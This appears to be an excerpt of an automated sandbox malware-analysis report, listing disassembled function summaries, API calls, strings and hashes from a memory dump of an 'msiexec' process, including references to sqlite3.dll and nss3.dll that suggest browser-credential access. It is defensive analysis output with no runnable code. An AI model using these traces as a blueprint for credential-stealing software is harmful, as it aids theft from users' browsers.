                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                • String ID: menu_%d
                                                                                                                                                • API String ID: 1129539653-2417748251
                                                                                                                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                • API String ID: 3334749609-1948609170
                                                                                                                                                • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                • API String ID: 1983510840-1155512374
                                                                                                                                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfileString
• String ID: A4@$Server Details
• API String ID: 1096422788-4071850762
• Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
• Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
• Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
• Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
APIs
• strlen.MSVCRT ref: 0040849A
• memset.MSVCRT ref: 004084D2
• memcpy.MSVCRT(?,00000000,?,?,?,?,67CD7B60,?,00000000), ref: 0040858F
• LocalFree.KERNEL32(00000000,?,?,?,?,67CD7B60,?,00000000), ref: 004085BA
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID:
• API String ID: 3110682361-0
• Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
• Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
• Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
• Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
APIs
• memcpy.MSVCRT(?,?,00000010), ref: 004161F4
• memcpy.MSVCRT(?,?,00000004), ref: 00416218
• memcpy.MSVCRT(?,?,00000004), ref: 0041623F
• memcpy.MSVCRT(?,?,00000008), ref: 00416265
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
• Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
• Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
• Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
• Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8